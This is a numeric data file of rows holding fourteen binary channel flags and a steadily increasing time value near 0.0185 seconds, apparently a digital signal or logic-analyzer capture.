0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471116e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471140e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8471144e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8471164e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8471188e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471196e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471212e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471240e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471264e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471292e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471316e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471340e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471364e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471388e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471412e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471440e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471464e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471492e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471516e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471540e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471564e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471588e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471612e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471640e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471664e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471692e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471716e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471740e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471764e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471788e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471812e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471840e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471864e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471892e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471916e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471940e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471964e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471988e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472012e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472040e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472068e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472092e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472116e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472140e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472164e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472192e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472212e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472244e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472268e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472292e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472316e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472340e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472364e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472392e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472416e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472444e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472468e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472492e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472516e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472540e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472564e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472592e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472616e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472644e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472668e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472692e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472716e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472740e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472764e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472792e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472816e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472844e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472868e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472892e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472916e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472940e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8472964e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8472992e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473016e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473044e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473068e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473092e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473116e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473140e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473164e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473192e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473216e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473244e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473268e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473292e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473316e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473340e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473364e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473392e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473416e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473444e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473468e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473492e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473516e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473540e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473564e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473592e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473616e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473644e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473668e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473692e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473716e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473740e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473764e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473792e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473816e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473844e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473868e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473892e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473916e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473940e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8473964e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8473992e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8474016e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8474044e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8474068e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8474092e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8474116e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8474140e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8474164e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8474192e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8474212e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8474244e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8474268e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8474292e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8474316e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8474340e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8474364e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8474392e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8474416e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8474444e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8474468e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8474492e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8599076e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8599296e-02 1,0,1,1,1,0,0,0,0,0,0,1,0,1,1.8599324e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8599352e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,1.8599644e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8599664e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.8599672e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,1,1.8599716e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.8599740e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8599748e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,1.8599764e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8599788e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.8599796e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,1,1.8599840e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.8599864e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,1,1.8599872e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8599876e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,1.8599892e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8599912e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8599916e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8599920e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8599964e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8599988e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8599996e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8600016e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8600040e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8600044e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8600092e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8600116e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8600124e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8600140e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8600164e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8600188e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8600212e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8600240e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8600264e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8600292e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,1.8600316e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8600320e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8600364e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8600388e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8600396e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8600412e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8600440e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8600444e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8600492e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8600516e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8600524e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8600540e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8600564e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8600588e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8600612e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8600640e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8600664e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8600692e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,1.8600716e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8600720e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8600764e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8600788e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8600796e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8600812e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8600840e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8600844e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8600892e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8600916e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8600924e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8600940e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8600964e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8600988e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601012e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8601040e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601064e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8601092e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,1.8601116e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8601120e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8601164e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8601188e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601196e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8601216e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601240e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8601264e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601292e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8601316e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601340e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8601364e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601388e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8601416e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601440e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8601464e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8601492e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8601540e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8601564e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601572e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8601588e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601612e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8601640e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601664e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8601668e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8601716e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8601740e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601748e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8601764e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601788e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8601812e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601840e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8601864e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601892e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8601916e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601940e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8601964e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8601988e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8601996e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8602040e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8602064e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8602072e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8602092e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8602116e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8602140e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8602164e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8602188e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8602212e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8602240e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8602264e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8602268e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8602316e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8602340e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8602348e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8602364e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8602388e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8602396e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8602440e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8602464e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8602472e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8602516e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8602540e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8602588e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8602612e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8602668e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,1.8602692e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8602696e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8602740e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8602764e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8602772e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8602816e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8602840e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8602864e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8602892e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8602916e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8602940e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8602944e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8602988e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8603012e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603020e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603040e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603064e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603092e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603116e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603140e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603164e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603188e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603212e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603240e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603260e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603292e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603316e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603340e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603364e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603388e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603412e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603440e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603460e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603492e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603516e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603540e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603564e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603588e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603612e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603640e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603660e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603692e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603716e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603740e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603764e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603788e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603812e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603840e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603860e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603892e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603916e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603940e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8603964e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8603988e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604012e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604040e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604060e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604092e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604116e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604140e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604164e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604188e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604212e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604240e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604260e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604292e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604316e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604340e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604364e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604388e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604412e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604440e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604464e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604492e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604516e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604540e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604564e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604588e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604612e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604640e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604664e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604692e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604716e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604740e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604764e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604788e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604812e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604840e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604864e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604892e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604916e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604940e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8604964e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8604988e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605012e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605040e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605064e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605092e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605116e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605140e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605164e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605188e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605212e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605240e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605264e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605292e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605316e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605340e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605364e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605388e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605412e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605440e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605464e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605492e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605516e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605540e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605564e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605588e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605612e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605640e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605664e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605692e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605716e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605788e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605812e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605832e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605892e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605912e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8605932e-02 